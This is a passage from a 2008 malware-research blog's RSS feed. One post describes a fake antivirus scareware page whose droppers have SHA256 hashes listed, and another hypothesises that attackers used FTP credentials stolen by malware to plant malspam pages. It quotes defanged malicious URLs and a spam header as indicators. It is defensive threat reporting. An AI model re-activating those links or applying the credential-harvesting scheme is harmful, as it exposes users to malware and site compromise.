<p style="center;"><a title="picture-31" rel="lightbox[pics190]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-31.png"><img class="attachment wp-att-194 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-31.thumbnail.png" alt="picture-31" width="200" height="122" /></a></p>
<p>Funny enough, clicking on the &#8220;Close this page&#8221; button at the top <em>attempts </em>to redirect to hxxp://79.135.167.18/antivirus, but due to a bit of a coding error on the behalf of the <em>bad guys/gals</em>, it looks like they only appended that URL to the existing one, e.g. <strong>hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus</strong>&#8230;yielding a 404:</p>
<p style="center;"><a title="picture-41" rel="lightbox[pics190]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-41.png"><img class="attachment wp-att-195 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-41.thumbnail.png" alt="picture-41" width="200" height="51" /></a></p>
<p>Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven&#8217;t finished their virus scan! GASP!</p>
<p style="center;"><a title="picture-5" rel="lightbox[pics190]" href="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-5.png"><img class="attachment wp-att-196 centered" src="http://malwaredatabase.net/blog/wp-content/uploads/2008/08/picture-5.thumbnail.png" alt="picture-5" width="200" height="120" /></a></p>
<p>The dropper looks to be very similar to the ones we&#8217;ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. Two different filenames, <strong>scaner.exe</strong> [sic] and <strong>install.exe</strong>. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we&#8217;ve seen so far, this one&#8217;s going to download <strong>&#8220;Antivirus XP 2008&#8243;</strong> again, so nothing new there, either.</p>
<p>SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca<br />
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/08/18/weekly-top-news-new/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>CNN &amp; MSNBC Attack &#8211; Where is it all coming from?</title>
		<link>http://malwaredatabase.net/blog/index.php/2008/08/15/cnn-msnbc-attack-where-is-it-all-coming-from/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2008/08/15/cnn-msnbc-attack-where-is-it-all-coming-from/#comments</comments>
		<pubDate>Fri, 15 Aug 2008 09:04:56 +0000</pubDate>
		<dc:creator>lithium</dc:creator>
				<category><![CDATA[MalSpam]]></category>
		<category><![CDATA[Malicious Domains]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Thoughts]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=166</guid>
		<description><![CDATA[My e-mail inbox has been flooded since breaking the CNN malspam story.  Everyone wants to know where this attack is coming from and how it&#8217;s releasing itself into the wild so quickly.  I&#8217;m sorry to say that I do not have the answer yet&#8230; but I do have a hypothesis.
I believe the attack [...]]]></description>
			<content:encoded><![CDATA[<p>My e-mail inbox has been flooded since breaking the CNN malspam story.  Everyone wants to know where this attack is coming from and how it&#8217;s releasing itself into the wild so quickly.  I&#8217;m sorry to say that I do not have the answer yet&#8230; but I do have a hypothesis.</p>
<p>I believe the attack is exploited 100% through hacked/infected computers.  We know that the e-mails are being distributed by infected computers as we can tell from the e-mail headers, most of the e-mails come from private ADSL or cable lines.  One question remains&#8230; how are the websites getting owned?   Take a second to consider the following possibility&#8230;</p>
<p>I own domain.com and I don&#8217;t know a whole lot about HTML.  I want a flashy website so I go out and buy &#8220;Build Your Own Website Software 1.0&#8243;.  This type of software has several useful features such as a WYSIWYG editor, scripts, images, templates, and <strong><span style="text-decoration: underline;"> automatic FTP upload features.</span></strong></p>
<p>If my machine is infected with malware it will most definitely search for FTP credentials.  If the hackers spent a long enough time harvesting the FTP credentials all they needed to do is write software to upload their malicious pages to each site and then direct their botnet to start spamming the links at the same time.  </p>
<p>Let&#8217;s look at one of the e-mails we received:<br />
Header:</p>
<blockquote><p>Received: from *.adsl.alicedsl.de (*.adsl.alicedsl.de [78.4*.15*.28*])</p></blockquote>
<p>This header shows us that the mail was sent from a private ADSL line on the de TLD.</p>
<p>Body:</p>
<blockquote><p>Girl trains monkey to give tongue service video hxxp://download.german-railroads.eu/start.html</p></blockquote>
<p> The body of the e-mail contains a link to a German railroads site.  Is this a coincidence?</p>
<p>I feel that my hypothesis is fairly obvious but I have not seen much speculation about the attack vector and I would like some input from our readers.  What do you think?  </p>
<p>If anyone reading this post has had their website compromised by this attack, please contact me at lithium@malwaredatabase.net as I would like to perform a post-mortem analysis to identify the attack vector.  </p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2008/08/15/cnn-msnbc-attack-where-is-it-all-coming-from/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
